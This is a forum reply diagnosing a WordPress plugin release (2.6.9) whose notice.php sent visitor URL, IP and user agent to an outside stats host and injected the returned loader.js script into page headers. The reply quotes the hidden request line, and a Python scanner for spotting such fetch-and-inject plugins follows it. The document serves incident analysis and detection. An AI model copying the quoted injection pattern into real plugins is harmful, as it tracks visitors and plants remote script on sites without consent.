Forum Replies Created

Viewing 1 replies (of 1 total)
  • Mike:

    That’s interesting. While I have never actually experienced the popup/popunder ad issue, we did see the script call to the above referenced loader.js. Yesterday, that script was collecting site info, but today it is now also attempting to inject ad content (have only been testing with curl from a remote location, not actually using a browser). For us, at least so far, only 2.6.9 was injecting the loader.js script call. The URL hosting that file is what identified the issue as Google had flagged the impacted site as containing malware and disabled any associated AdWords.

    While testing today with a staging site, flipping back and forth between version 2.6.9 and 2.7.0 appears to make the loader.js content come and go. This prompted further investigation into what specifically was injecting the malware code. We narrowed it down to accelio_call_service and accelio_overlay in notice.php in version 2.6.9. The init method of AccelioNotice would make the below request to apistats DOT net during initialization, the response of which would then be injected in the header using add_action( 'wp_head', array( $this, 'accelio_overlay' ) ).

    http://apistats DOT net/v1/stats/update?url=' . urlencode( 'http://' . $http_host . $request_uri ) . '&ip=' . urlencode( self::get_the_user_ip() ) . '&ua=' . urlencode( $user_agent ) . '&id=m4ngf8'

    If you hit the above URL, you will see that its response is now the loader.js URL, which in turn yields the bad things we have seen.

    Given the above, I am quite confident that at least the issues that we were seeing were indeed caused by the inclusion of notice.php and its calls to apistats DOT net. I am quite puzzled as to why you are still seeing them after upgrading to 2.7.0 which removed notice.php. Hopefully the plugin author can help to shed some additional light on things.

    -craig
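
The pattern described in the reply above (a plugin file that fetches remote content and also registers a `wp_head` callback) can be triaged across an installed plugin tree with a short scanner. This is an added example, not part of the forum reply and not the plugin's code; the function names `scan_php` and `scan_tree`, the host `stats.example.invalid`, and both PHP samples are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Calls that can pull content from a remote server (real PHP / WordPress functions).
FETCH = re.compile(r"\b(wp_remote_get|wp_remote_post|wp_remote_request|curl_exec|file_get_contents)\s*\(")
# add_action() registrations on hooks whose output is printed into every page.
HOOK = re.compile(r"add_action\s*\(\s*['\"](wp_head|wp_footer)['\"]\s*,\s*(.+?)\)\s*;", re.S)
# Hard-coded URL hosts, so the reviewer sees where the content would come from.
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def scan_php(source):
    """Return a finding if one file both fetches remote content and hooks page
    output; otherwise None. A heuristic for triage, not proof of injection."""
    hooks = []
    for hook, callback in HOOK.findall(source):
        names = re.findall(r"['\"](\w+)['\"]", callback)
        hooks.append((hook, names[-1] if names else "<closure>"))
    fetch_calls = sorted(set(FETCH.findall(source)))
    if not hooks or not fetch_calls:
        return None
    return {"hooks": hooks, "fetch_calls": fetch_calls,
            "hosts": sorted(set(HOST.findall(source)))}

def scan_tree(root):
    """Yield (path, finding) for every flagged .php file under root."""
    for path in sorted(Path(root).rglob("*.php")):
        finding = scan_php(path.read_text(errors="replace"))
        if finding:
            yield str(path), finding

# Constructed sample, not the plugin's code: fetch in init(), echo in wp_head.
SAMPLE_SUSPECT = r"""<?php
class Example_Notice {
    function init() {
        $this->body = wp_remote_retrieve_body( wp_remote_get(
            'http://stats.example.invalid/v1/update?url=' . urlencode( $_SERVER['REQUEST_URI'] ) ) );
        add_action( 'wp_head', array( $this, 'example_overlay' ) );
    }
    function example_overlay() { echo $this->body; }
}
"""
# Constructed sample: hooks wp_head but only prints a local string.
SAMPLE_BENIGN = r"""<?php
add_action( 'wp_head', 'example_print_meta' );
function example_print_meta() { echo '<meta name="generator" content="example">'; }
"""

if __name__ == "__main__":
    for path, finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path, finding)
```

Run it against `wp-content/plugins` on a staging copy; each flagged file still needs manual review to confirm that the fetched response is what the hooked callback prints.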
